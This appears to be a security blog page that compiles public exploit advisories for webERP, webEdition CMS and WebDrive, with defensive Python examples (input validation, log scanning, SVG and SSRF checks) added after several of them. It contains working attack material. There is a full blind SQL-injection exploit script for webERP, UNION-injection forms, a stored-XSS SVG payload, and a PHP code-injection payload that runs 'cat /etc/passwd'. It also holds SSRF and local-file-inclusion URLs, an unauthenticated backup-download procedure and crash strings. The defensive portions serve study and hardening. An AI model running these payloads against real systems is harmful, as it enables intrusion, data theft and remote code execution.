About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

source: https://www.securityfocus.com/bid/50713/info
 
webERP is prone to information-disclosure, SQL-injection, and cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
 
An attacker may exploit the information-disclosure issue to gain access to sensitive information that may lead to further attacks.
 
An attacker may exploit the SQL-injection issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
 
An attacker may leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
 
webERP 4.0.5 is vulnerable; prior versions may also be affected. 

http://www.example.com/reportwriter/ReportMaker.php?action=go&reportid=SQL_CODE_HERE
            
<form action="http://www.example.com/reportwriter/FormMaker.php" method="post">
<input type="hidden" name="ReportID" value="1 union select version(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20">
<input type="hidden" name="FormID" value="[FormID]" />
<input type="hidden" name="todo" value="Criteria Setup" />
<input type="submit" value="submit" id="btn">
</form>
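The fix for the reportid parameter of ReportMaker.php and the ReportID field of FormMaker.php is to enforce the expected type and bind the value as a query parameter instead of splicing it into SQL text. The following is an added example and not webERP's own code: Python with an in-memory SQLite table standing in for webERP's PHP/MySQL layer, with the concatenation pattern next to its hardened form. The schema and rows are constructed; the same pattern applies to the webEdition we_fs.php what parameter further down this page.

```python
import sqlite3
from typing import List, Tuple

def make_db() -> sqlite3.Connection:
    """Constructed sample schema: a reports table plus a users table that a
    UNION-based injection would try to read."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE reports (id INTEGER PRIMARY KEY, name TEXT, owner TEXT)")
    con.executemany("INSERT INTO reports VALUES (?, ?, ?)",
                    [(1, "Sales by month", "alice"), (2, "Stock levels", "bob")])
    con.execute("CREATE TABLE users (username TEXT, password_hash TEXT)")
    con.execute("INSERT INTO users VALUES ('admin', 'h4sh3d')")
    return con

def lookup_report_unsafe(con: sqlite3.Connection, reportid: str) -> List[Tuple]:
    """Vulnerable pattern: the request parameter is spliced into the SQL text,
    so a value such as the advisory's '1 union select ...' rewrites the query."""
    sql = "SELECT id, name, owner FROM reports WHERE id = " + reportid
    return con.execute(sql).fetchall()

def lookup_report_safe(con: sqlite3.Connection, reportid: str) -> List[Tuple]:
    """Hardened pattern: enforce the expected type, then bind the value so the
    database driver never interprets it as SQL."""
    if not reportid.isdigit():
        raise ValueError("reportid must be a non-negative integer")
    return con.execute("SELECT id, name, owner FROM reports WHERE id = ?",
                       (int(reportid),)).fetchall()

if __name__ == "__main__":
    db = make_db()
    payload = "1 UNION SELECT 0, username, password_hash FROM users"
    print("unsafe:", lookup_report_unsafe(db, payload))   # the users row comes back too
    try:
        lookup_report_safe(db, payload)
    except ValueError as exc:
        print("safe:", exc)
```

The type check is what rejects the payload; the parameter binding is what keeps a value that does pass the check from ever being parsed as SQL. Both are needed: a bound string parameter would also be safe, but the integer check gives the earliest and clearest rejection.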
            
# Exploit Title: webERP 4.15.1 - Unauthenticated Backup File Access
# Date: 2020-05-01
# Author: Besim ALTINOK
# Vendor Homepage: http://www.weberp.org
# Software Link: https://sourceforge.net/projects/web-erp/
# Version: v4.15.1
# Tested on: Xampp
# Credit: İsmail BOZKURT

--------------------------------------------------------------------------
About Software:

webERP is a complete web-based accounting and business management system
that requires only a web-browser and pdf reader to use. It has a wide range
of features suitable for many businesses particularly distributed
businesses in wholesale, distribution, and manufacturing.

-------------------------------------------------------
PoC Unauthenticated Backup File Access
---------------------------------------------

1- Requesting this script generates a new backup file:
http://localhost/webERP/BackUpDatabase.php
2- The backup file can then be downloaded, without authentication, from:
http://localhost/webERP/companies/weberp/Backup_2020-05-01-16-55-35.sql.gz
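A defender's counterpart to the two steps above, as an added example that is not part of the advisory or of webERP: a scan over Apache combined-format access log lines that flags requests to BackUpDatabase.php and downloads of Backup_*.sql.gz files under companies/. The log lines are constructed; only the two paths come from the advisory.

```python
import re
from typing import Dict, List

# Apache "combined" log format: client, identd, user, [time], "request", status, size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Paths from the advisory above; companies/<name>/ may be any company directory.
SUSPICIOUS = [
    ("backup-generate", re.compile(r"/BackUpDatabase\.php(\?|$)", re.I)),
    ("backup-download", re.compile(r"/companies/[^/]+/Backup_[\d-]+\.sql\.gz(\?|$)", re.I)),
]

# Constructed sample log: one ordinary page view, the generate request, the
# download, and an unrelated request from a second client.
SAMPLE_LOG = """\
203.0.113.5 - - [01/May/2020:16:55:30 +0000] "GET /webERP/index.php HTTP/1.1" 200 5120
203.0.113.5 - - [01/May/2020:16:55:35 +0000] "GET /webERP/BackUpDatabase.php HTTP/1.1" 200 812
203.0.113.5 - - [01/May/2020:16:56:02 +0000] "GET /webERP/companies/weberp/Backup_2020-05-01-16-55-35.sql.gz HTTP/1.1" 200 2048576
198.51.100.7 - - [01/May/2020:17:01:10 +0000] "GET /webERP/StockStatus.php?StockID=ABC HTTP/1.1" 200 4000
"""

def scan_access_log(text: str) -> List[Dict[str, str]]:
    """Return one finding per matching request, in log order."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                       # skip lines that are not in combined format
        for rule, pattern in SUSPICIOUS:
            if pattern.search(m["path"]):
                findings.append({"rule": rule, "ip": m["ip"], "ts": m["ts"],
                                 "path": m["path"], "status": m["status"]})
    return findings

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print("%(rule)s %(ip)s %(status)s %(path)s" % f)
```

A status of 200 on the backup-download rule means the dump actually left the server; a 403 or 404 on the same path is still worth noting as reconnaissance. Beyond detection, the web server should not serve the companies/ backup directory directly at all, and BackUpDatabase.php should require an authenticated administrator.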
            
# Exploit Title: Blind SQL injection in WebERP.
# Date: June 10, 2019
# Exploit Author: Semen Alexandrovich Lyhin (https://www.linkedin.com/in/semenlyhin/)
# Vendor Homepage: http://www.weberp.org/
# Version: 4.15

# A malicious payload can be sent, base64-encoded, to the unserialize() function; it is then deserialized into an array without any sanitization.
# After that, each element of the array is passed directly into the SQL query.

import requests
import base64
import os
import subprocess
from bs4 import BeautifulSoup
import re
import time
import sys

def generatePayload(PaidAmount="0",PaymentId="0"):
    #THIS FUNCTION IS INSECURE BY DESIGN
    ToSerialize = r"[\"%s\" => \"%s\"]" % (PaymentId, PaidAmount)
    return os.popen("php -r \"echo base64_encode(serialize(" + ToSerialize + "));\"").read()

def getCookies(ip, CompanyNameField, usr, pwd):
    r = requests.get("http://" + ip + "/index.php")
    s = BeautifulSoup(r.text, 'lxml')
    m = re.search("FormID.*>", r.text)
    FormID = m.group(0).split("\"")[2]
    
    data = {"FormID":FormID,"CompanyNameField":CompanyNameField,"UserNameEntryField":usr,"Password":pwd,"SubmitUser":"Login"}
    r = requests.post("http://" + ip + "/index.php", data)
    
    return {"PHPSESSIDwebERPteam":r.headers["Set-Cookie"][20:46]}
    

def addSupplierID(name, cookies, proxies):
    r = requests.get("http://" + ip + "/Suppliers.php", cookies=cookies)
    s = BeautifulSoup(r.text, 'lxml')
    m = re.search("FormID.*>", r.text)
    FormID = m.group(0).split("\"")[2]
    
    data = {"FormID":FormID,"New":"Yes","SupplierID":name,"SuppName":name,"SupplierType":"1","SupplierSince":"01/06/2019","BankPartics":"","BankRef":"0",
            "PaymentTerms":"20","FactorID":"0","TaxRef":"","CurrCode":"USD","Remittance":"0","TaxGroup":"1","submit":"Insert+New+Supplier"}
            
    requests.post("http://" + ip + "/Suppliers.php", data=data,cookies=cookies,proxies=proxies)


def runExploit(cookies, supplier_id, payload, proxies):
    r = requests.get("http://" + ip + "/Payments.php", cookies=cookies)
    s = BeautifulSoup(r.text, 'lxml')
    m = re.search("FormID.*>", r.text)
    FormID = m.group(0).split("\"")[2]
    
    data = {"FormID":FormID,
            "CommitBatch":"2",
            "BankAccount":"1",
            "DatePaid":"01/06/2019",
            "PaidArray":payload}
         
    requests.post("http://" + ip + "/Payments.php?identifier=1559385755&SupplierID=" + supplier_id, data=data,cookies=cookies,proxies=proxies)


if __name__ == "__main__":
    #proxies = {'http':'127.0.0.1:8080'}
    proxies = {}
    
    if len(sys.argv) != 6:
        print('(+) usage: %s <target> <path> <login> <password> <order>' % sys.argv[0])
        print('(+) eg: %s 127.0.0.1 "weberp/webERP/" admin weberp 1' % sys.argv[0])
        print('Order means the number of the company on the website. It can be gathered from the login page and usually equals 0 or 1')
        sys.exit(1)
    
    ip = sys.argv[1] + "/" + sys.argv[2]
    
    #if don't have php, set Payload to the next one to check this time-based SQLi: YToxOntpOjA7czoyMzoiMCB3aGVyZSBzbGVlcCgxKT0xOy0tIC0iO30=
    #payload = generatePayload("0 where sleep(1)=1;-- -", "0")
    
    payload = generatePayload("0", "' or sleep(5) and '1'='1")
    
    #get cookies
    cookies = getCookies(ip, sys.argv[5], sys.argv[3], sys.argv[4])
    
    addSupplierID("GARUMPAGE", cookies, proxies)
    
    t1 = time.time()
    runExploit(cookies, "GARUMPAGE", payload, proxies)
    t2 = time.time()
    
    if (t2 - t1 > 4):
        print("Blind SQLi is confirmed")
    else:
        print("Verify input data and try again")
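The root cause described in the header comments is that the base64-decoded, unserialized PaidArray reaches SQL with no type checks. The following is an added example and not webERP's code: a minimal parser for flat PHP-serialized arrays plus a validator that enforces integer payment ids and numeric amounts before anything is handed to the database. The malicious sample is the base64 string quoted in the script's comments above; the benign and string-key samples are constructed here.

```python
import base64
from decimal import Decimal, InvalidOperation
from typing import Dict, Tuple, Union

Scalar = Union[int, float, str]

def parse_php_array(data: bytes) -> Dict[Union[int, str], Scalar]:
    """Parse a flat PHP-serialized array (a:N:{key;value;...}) with int or
    string keys and int/double/string values. Objects, nesting and anything
    unrecognised raise ValueError instead of being interpreted."""
    pos = 0

    def expect(tok: bytes) -> None:
        nonlocal pos
        if not data.startswith(tok, pos):
            raise ValueError("expected %r at offset %d" % (tok, pos))
        pos += len(tok)

    def read_until(ch: bytes) -> bytes:
        nonlocal pos
        end = data.find(ch, pos)
        if end < 0:
            raise ValueError("unterminated token")
        tok, pos = data[pos:end], end + 1
        return tok

    def read_scalar() -> Scalar:
        nonlocal pos
        kind = data[pos:pos + 1]
        if kind == b"i":
            expect(b"i:")
            return int(read_until(b";"))
        if kind == b"d":
            expect(b"d:")
            return float(read_until(b";"))
        if kind == b"s":
            expect(b"s:")
            n = int(read_until(b":"))
            expect(b'"')
            if n < 0 or len(data) - pos < n:
                raise ValueError("string length exceeds input")
            s, pos = data[pos:pos + n], pos + n
            expect(b'";')
            return s.decode("utf-8")
        raise ValueError("unsupported type %r" % kind)

    expect(b"a:")
    count = int(read_until(b":"))
    expect(b"{")
    out: Dict[Union[int, str], Scalar] = {}
    for _ in range(count):
        key = read_scalar()
        if isinstance(key, float):
            raise ValueError("float array key")
        out[key] = read_scalar()
    expect(b"}")
    if pos != len(data):
        raise ValueError("trailing data after array")
    return out

def validate_paid_array(b64: str) -> Tuple[bool, str]:
    """Return (ok, reason). Keys must be non-negative integer payment ids and
    values non-negative finite decimal amounts, so neither of the advisory's
    payloads (SQL in the amount, SQL in the key) survives to the query."""
    try:
        arr = parse_php_array(base64.b64decode(b64, validate=True))
    except (ValueError, UnicodeDecodeError) as exc:
        return False, "malformed payload: %s" % exc
    for key, value in arr.items():
        if not isinstance(key, int) or key < 0:
            return False, "payment id is not a non-negative integer: %r" % (key,)
        try:
            amount = Decimal(str(value))
        except InvalidOperation:
            return False, "amount is not numeric: %r" % (value,)
        if not amount.is_finite() or amount < 0:
            return False, "amount out of range: %r" % (value,)
    return True, "ok"

# Samples: PAGE_PAYLOAD is the string from the exploit comments above; the
# other two are constructed.
PAGE_PAYLOAD = "YToxOntpOjA7czoyMzoiMCB3aGVyZSBzbGVlcCgxKT0xOy0tIC0iO30="
BENIGN_PAYLOAD = base64.b64encode(b'a:1:{i:7;s:5:"12.50";}').decode()
STRING_KEY_PAYLOAD = base64.b64encode(b'a:1:{s:3:"abc";s:1:"0";}').decode()

if __name__ == "__main__":
    for name, p in [("page", PAGE_PAYLOAD), ("benign", BENIGN_PAYLOAD), ("string key", STRING_KEY_PAYLOAD)]:
        print(name, validate_paid_array(p))
```

The validator is a second line of defence; the amounts and ids still have to be bound as query parameters when they reach SQL. Replacing unserialize() on request data with a plain JSON array of {id, amount} pairs would remove the deserialization surface entirely.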
            
Exploit Title: Webedition CMS v2.9.8.8 - Stored XSS
Application: Webedition CMS
Version: v2.9.8.8   
Bugs:  Stored Xss
Technology: PHP
Vendor URL: https://www.webedition.org/
Software Link: https://download.webedition.org/releases/OnlineInstaller.tgz?p=1
Date of found: 03.08.2023
Author: Mirabbas Ağalarov
Tested on: Linux 


2. Technical Details & POC
========================================
Steps:
1. Log in to the account
2. Go to New -> Media -> Image
3. Upload a malicious SVG file
SVG file content:

"""
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.location);
   </script>
</svg>
"""


Poc request:

POST /webEdition/we_cmd.php?we_cmd[0]=save_document&we_cmd[1]=&we_cmd[2]=&we_cmd[3]=&we_cmd[4]=&we_cmd[5]=&we_cmd[6]= HTTP/1.1
Host: localhost
Content-Length: 761
Cache-Control: max-age=0
sec-ch-ua: 
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: iframe
Referer: http://localhost/webEdition/we_cmd.php?we_cmd[0]=switch_edit_page&we_cmd[1]=0&we_cmd[2]=73fee01822cc1e1b9ae2d7974583bb8e
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: treewidth_main=300; WESESSION=e781790f1d79ddaf9e3a0a4eb42e55b04496a569; cookie=yep; treewidth_main=300
Connection: close

we_transaction=73fee01822cc1e1b9ae2d7974583bb8e&we_cea6f7e60ce62be78e59f849855d2038_Filename=malas&we_cea6f7e60ce62be78e59f849855d2038_Extension=.svg&wetmp_we_cea6f7e60ce62be78e59f849855d2038_Extension=&we_cea6f7e60ce62be78e59f849855d2038_ParentPath=%2F&we_cea6f7e60ce62be78e59f849855d2038_ParentID=0&yuiAcContentTypeParentPath=&we_cea6f7e60ce62be78e59f849855d2038_IsSearchable=1&check_we_cea6f7e60ce62be78e59f849855d2038_IsSearchable=1&we_cea6f7e60ce62be78e59f849855d2038_IsProtected=0&fold%5B0%5D=0&fold_named%5BPropertyPage_2%5D=0&fold%5B1%5D=0&fold_named%5BPropertyPage_3%5D=0&wetmp_cea6f7e60ce62be78e59f849855d2038_CreatorID=%2Fadmin&we_cea6f7e60ce62be78e59f849855d2038_CreatorID=1&we_cea6f7e60ce62be78e59f849855d2038_RestrictOwners=0&we_complete_request=1
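The upload path accepts an SVG that carries a script element and later serves it inline, which is what turns the image into stored XSS. As an added example, not webEdition code, the check below parses an uploaded SVG and lists every piece of active content (script and embedding elements, on* event attributes, javascript: links) so the upload can be refused. The sample document is the SVG from the advisory above.

```python
import xml.etree.ElementTree as ET
from typing import List

SVG_NS = "{http://www.w3.org/2000/svg}"
FORBIDDEN_ELEMENTS = {"script", "foreignobject", "iframe", "embed", "object"}

# The SVG from the advisory above.
SAMPLE_SVG = """<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.location);
   </script>
</svg>
"""

def svg_active_content(svg_text: str) -> List[str]:
    """Return the reasons an uploaded SVG should be rejected (empty == clean).
    The document is parsed, not pattern-matched, so namespace prefixes and
    whitespace tricks do not hide the elements."""
    reasons: List[str] = []
    try:
        root = ET.fromstring(svg_text)
    except ET.ParseError as exc:
        return ["not well-formed XML: %s" % exc]
    if root.tag != SVG_NS + "svg":
        reasons.append("root element is not svg: %s" % root.tag)
    for el in root.iter():
        local = el.tag.split("}")[-1] if isinstance(el.tag, str) else ""
        if local.lower() in FORBIDDEN_ELEMENTS:
            reasons.append("forbidden element <%s>" % local)
        for attr, value in el.attrib.items():
            name = attr.split("}")[-1].lower()      # strip any namespace, e.g. xlink:href
            if name.startswith("on"):
                reasons.append("event handler attribute %s on <%s>" % (name, local))
            if name == "href" and value.strip().lower().startswith("javascript:"):
                reasons.append("javascript: URL in %s on <%s>" % (name, local))
    return reasons

if __name__ == "__main__":
    for r in svg_active_content(SAMPLE_SVG) or ["clean"]:
        print(r)
```

Rejecting the file is only half of the fix: the application should also serve uploaded media with Content-Disposition: attachment or a dedicated sandbox origin, so that an SVG which slips through is never rendered inline on the CMS origin.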
            
Exploit Title: Webedition CMS v2.9.8.8 - Remote Code Execution (RCE)
Application: webedition Cms
Version: v2.9.8.8   
Bugs:  RCE
Technology: PHP
Vendor URL: https://www.webedition.org/
Software Link: https://download.webedition.org/releases/OnlineInstaller.tgz?p=1
Date of found: 03.08.2023
Author: Mirabbas Ağalarov
Tested on: Linux 


2. Technical Details & POC
========================================
Steps:
1. Log in to the account
2. Go to New -> Webedition page -> empty page
3. Select php
4. Put "><?php echo system("cat /etc/passwd");?> in the Description area

Poc request: 

POST /webEdition/we_cmd.php?we_cmd[0]=switch_edit_page&we_cmd[1]=0&we_cmd[2]=4fd880c06df5a590754ce5b8738cd0dd HTTP/1.1
Host: localhost
Content-Length: 1621
Cache-Control: max-age=0
sec-ch-ua: 
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: iframe
Referer: http://localhost/webEdition/we_cmd.php?we_cmd[0]=switch_edit_page&we_cmd[1]=0&we_cmd[2]=4fd880c06df5a590754ce5b8738cd0dd
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: treewidth_main=300; WESESSION=e781790f1d79ddaf9e3a0a4eb42e55b04496a569; cookie=yep; treewidth_main=300
Connection: close

we_transaction=4fd880c06df5a590754ce5b8738cd0dd&we_003be033b474a5c25132d388906fb4ae_Filename=poc&we_003be033b474a5c25132d388906fb4ae_Extension=.php&wetmp_we_003be033b474a5c25132d388906fb4ae_Extension=&we_003be033b474a5c25132d388906fb4ae_ParentPath=%2F&we_003be033b474a5c25132d388906fb4ae_ParentID=0&yuiAcContentTypeParentPath=&we_003be033b474a5c25132d388906fb4ae_DocType=&we_003be033b474a5c25132d388906fb4ae_TemplateName=%2F&we_003be033b474a5c25132d388906fb4ae_TemplateID=&yuiAcContentTypeTemplate=&we_003be033b474a5c25132d388906fb4ae_IsDynamic=0&we_003be033b474a5c25132d388906fb4ae_IsSearchable=0&we_003be033b474a5c25132d388906fb4ae_InGlossar=0&we_003be033b474a5c25132d388906fb4ae_txt%5BTitle%5D=asdf&we_003be033b474a5c25132d388906fb4ae_txt%5BDescription%5D=%22%3E%3C%3Fphp+echo+system%28%22cat+%2Fetc%2Fpasswd%22%29%3B%3F%3E&we_003be033b474a5c25132d388906fb4ae_txt%5BKeywords%5D=asdf&fold%5B0%5D=0&fold_named%5BPropertyPage_3%5D=0&we_003be033b474a5c25132d388906fb4ae_Language=en_GB&we_003be033b474a5c25132d388906fb4ae_LanguageDocName%5Bde_DE%5D=&we_003be033b474a5c25132d388906fb4ae_LanguageDocID%5Bde_DE%5D=&yuiAcContentTypeLanguageDocdeDE=&we_003be033b474a5c25132d388906fb4ae_LanguageDocName%5Ben_GB%5D=&we_003be033b474a5c25132d388906fb4ae_LanguageDocID%5Ben_GB%5D=&yuiAcContentTypeLanguageDocenGB=&fold%5B1%5D=0&fold_named%5BPropertyPage_4%5D=0&we_003be033b474a5c25132d388906fb4ae_CopyID=0&fold%5B2%5D=0&fold_named%5BPropertyPage_6%5D=0&wetmp_003be033b474a5c25132d388906fb4ae_CreatorID=%2Fadmin&we_003be033b474a5c25132d388906fb4ae_CreatorID=1&we_003be033b474a5c25132d388906fb4ae_RestrictOwners=0&we_complete_request=1
            
Exploit Title: Webedition CMS v2.9.8.8 - Blind SSRF
Application: Webedition CMS
Version: v2.9.8.8   
Bugs:  Blind SSRF
Technology: PHP
Vendor URL: https://www.webedition.org/
Software Link: https://download.webedition.org/releases/OnlineInstaller.tgz?p=1
Date of found: 07.09.2023
Author: Mirabbas Ağalarov
Tested on: Linux 


2. Technical Details & POC
========================================
Put https://youserver/test.xml in the we_cmd[0] parameter.

PoC request:

POST /webEdition/rpc.php?cmd=widgetGetRss&mod=rss HTTP/1.1
Host: localhost
Content-Length: 141
sec-ch-ua: 
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
sec-ch-ua-platform: ""
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/webEdition/index.php?we_cmd[0]=startWE
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: treewidth_main=300; WESESSION=41a9164e60666254199b3ea1cd3d2e0ad969c379; cookie=yep; treewidth_main=300
Connection: close

we_cmd[0]=https://YOU-SERVER/test.xml&we_cmd[1]=111000&we_cmd[2]=0&we_cmd[3]=110000&we_cmd[4]=&we_cmd[5]=m_3
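The RSS widget fetches whatever URL arrives in we_cmd[0], which is the whole SSRF. As an added example, not webEdition code, the function below vets a user-supplied feed URL before the server fetches it: scheme and port allowlist, no embedded credentials, and every address the host resolves to must be public. Resolution is injected so the check is testable offline; the FAKE_DNS table and its addresses are constructed.

```python
import ipaddress
import socket
from typing import Callable, Iterable, Tuple
from urllib.parse import urlsplit

Resolver = Callable[[str], Iterable[str]]

def system_resolver(host: str) -> Iterable[str]:
    """Production resolver: every address the name currently maps to."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}

def check_fetch_url(url: str, resolve: Resolver = system_resolver,
                    allowed_ports: Tuple[int, ...] = (80, 443)) -> Tuple[bool, str]:
    """Return (ok, reason) for a URL the server is about to fetch on a user's behalf."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, "scheme not allowed: %r" % parts.scheme
    host = parts.hostname
    if not host:
        return False, "missing host"
    if parts.username or parts.password:
        return False, "credentials in URL"
    try:
        port = parts.port or (443 if parts.scheme == "https" else 80)
    except ValueError:
        return False, "invalid port"
    if port not in allowed_ports:
        return False, "port not allowed: %d" % port
    try:
        addrs = [str(ipaddress.ip_address(host))]      # IP literal: nothing to resolve
    except ValueError:
        try:
            addrs = list(resolve(host))
        except OSError:                                # socket.gaierror is an OSError
            addrs = []
    if not addrs:
        return False, "host does not resolve"
    for addr in addrs:
        ip = ipaddress.ip_address(addr)
        if not ip.is_global:                           # loopback, RFC1918, link-local, etc.
            return False, "host resolves to non-public address %s" % ip
    return True, "ok"

# Constructed resolver table; 93.184.216.34 stands in for a public address.
FAKE_DNS = {
    "feeds.example.org": ["93.184.216.34"],
    "metadata.internal": ["169.254.169.254"],
    "rebind.example.net": ["93.184.216.34", "10.0.0.5"],   # one private answer is enough to refuse
}

def fake_resolver(host: str) -> Iterable[str]:
    if host not in FAKE_DNS:
        raise socket.gaierror("constructed NXDOMAIN for %s" % host)
    return FAKE_DNS[host]

if __name__ == "__main__":
    for u in ("https://feeds.example.org/test.xml", "http://metadata.internal/latest",
              "http://127.0.0.1:8080/", "file:///etc/passwd"):
        print(u, check_fetch_url(u, fake_resolver))
```

Checking the URL once is necessary but not sufficient: the HTTP client that performs the fetch must also refuse redirects (or re-run the check on each hop) and connect to the address that was validated, otherwise a redirect or a DNS answer that changes between check and connect gets around it.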
            
source: https://www.securityfocus.com/bid/47065/info

webEdition CMS is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to view and execute arbitrary local files in the context of the webserver process. This may aid in further attacks.

webEdition CMS 6.1.0.2 is vulnerable; other versions may also be affected. 

http://www.example.com/webEdition/index.php?DOCUMENT_ROOT= [lfi]%00
http://www.example.com/path_to_webEdition/index.php?DOCUMENT_ROOT= [lfi]%00 
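The DOCUMENT_ROOT value above is used as a path prefix, and the %00 suffix is there to cut off whatever the application appends after it. As an added example, not webEdition code, the helper below resolves a user-controlled path strictly inside a fixed base directory and rejects NUL bytes, absolute paths and traversal; the sample request values are constructed, with the NUL ones mirroring the advisory's %00 after URL decoding.

```python
import os
import tempfile
from typing import Dict
from urllib.parse import unquote

def safe_include_path(base_dir: str, user_value: str) -> str:
    """Return the real path of user_value inside base_dir, or raise ValueError."""
    if "\x00" in user_value:
        raise ValueError("NUL byte in path")
    if os.path.isabs(user_value) or user_value.startswith(("/", "\\")):
        raise ValueError("absolute paths are not allowed")
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, user_value))
    # realpath collapses ../ and follows symlinks, so a prefix check on the
    # resolved path is the reliable containment test.
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError("path escapes the base directory")
    return candidate

# Constructed request values.
SAMPLES = [
    "templates/index.tpl",
    "../../etc/passwd",
    "/etc/passwd",
    unquote("../../etc/passwd%00"),
    "templates/../../../etc/passwd",
]

def demo() -> Dict[str, str]:
    """Run every sample against a throwaway base directory."""
    results: Dict[str, str] = {}
    with tempfile.TemporaryDirectory() as base:
        os.makedirs(os.path.join(base, "templates"))
        for raw in SAMPLES:
            try:
                safe_include_path(base, raw)
                results[raw] = "ok"
            except ValueError as exc:
                results[raw] = "rejected: %s" % exc
    return results

if __name__ == "__main__":
    for raw, verdict in demo().items():
        print(repr(raw), "->", verdict)
```

A path that has to come from the request at all is the exception; for something like a document root, the value belongs in server configuration, and the request should at most select a key from a fixed map of allowed locations.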
            
source: https://www.securityfocus.com/bid/67689/info

webEdition CMS is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input.

A successful exploit will allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

webEdition CMS 6.3.3.0 through 6.3.8.0 svn6985 are vulnerable; other versions may also be affected. 

http://www.example.com/webEdition/we_fs.php?what=4[SQL]
            
#Exploit Title: WebDrive 18.00.5057 - Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2018-10-31
#Vendor Homepage: https://webdrive.com/
#Software Link: https://webdrive.com/download/
#Tested Version: 18.00.5057
#Tested on: Windows 10 Single Language x64

#Steps to produce the crash:
#1.- Run the Python script: WebDrive_18.00.5057.py
#2.- Open string.txt and copy its content to the clipboard
#3.- Open WebDrive
#4.- Select "New"
#5.- Select "Secure WebDAV" and click on "Siguiente" (Next)
#6.- Select "Url / Address" and put "1.1.1.1"
#7.- Select "Username" and paste the clipboard
#8.- Select "Password" and put "1234"
#9.- Click on "Test Connection"
#10.- Crash

cod = "\x41" * 5000

f = open('string.txt', 'w')
f.write(cod)
f.close()
            
#!/usr/bin/python
#Exploit Title:WebDrive Buffer OverFlow PoC
#Author: metacom
#Vendor Homepage: http://www.webdrive.com/products/webdrive/
#Software Link: https://www.webdrive.com/products/webdrive/download/
#Version: 12.2 (build # 4172) 32 bit
#Date found:     31.05.2015
#Date published: 31.05.2015
#Platform: Windows 7 Ultimate
#Bug: Multiple Buffer Overflow UNICODE
'''
----------------------------------------------------------------------------
Summary:
Unlike a typical FTP client, WebDrive allows you to open and
edit server-based files without the additional step of downloading the file.
Using a simple wizard, you assign a network drive letter to the FTP Server.
WebDrive supports additional protocols such as WebDAV, SFTP and Amazon S3 and
maps a drive letter to each of these servers. You can map unique drive letters
to multiple servers. Download the full-function 20-day trial of WebDrive and
make file management on remote servers easier and more efficient!
------------------------------------------------------------------------------
WebDrive connects to many types of web servers,
as well as servers in the cloud. You can use WebDrive
to access your files on all of the following server
types and protocols:

WebDAV ------------>Vulnerable
WebDAV over SSL---->Vulnerable
FTP---------------->Vulnerable
FTP over SSL------->Vulnerable
Amazon S3---------->Vulnerable
SFTP--------------->Vulnerable
FrontPage Server--->Vulnerable

------------------------------------------------------------------------------
How to Crash:

Copy the AAAA...string from WebDrive.txt to clipboard, create a connection 
and paste it in the URL/Address and attempt to connect.


WebDAV
============================
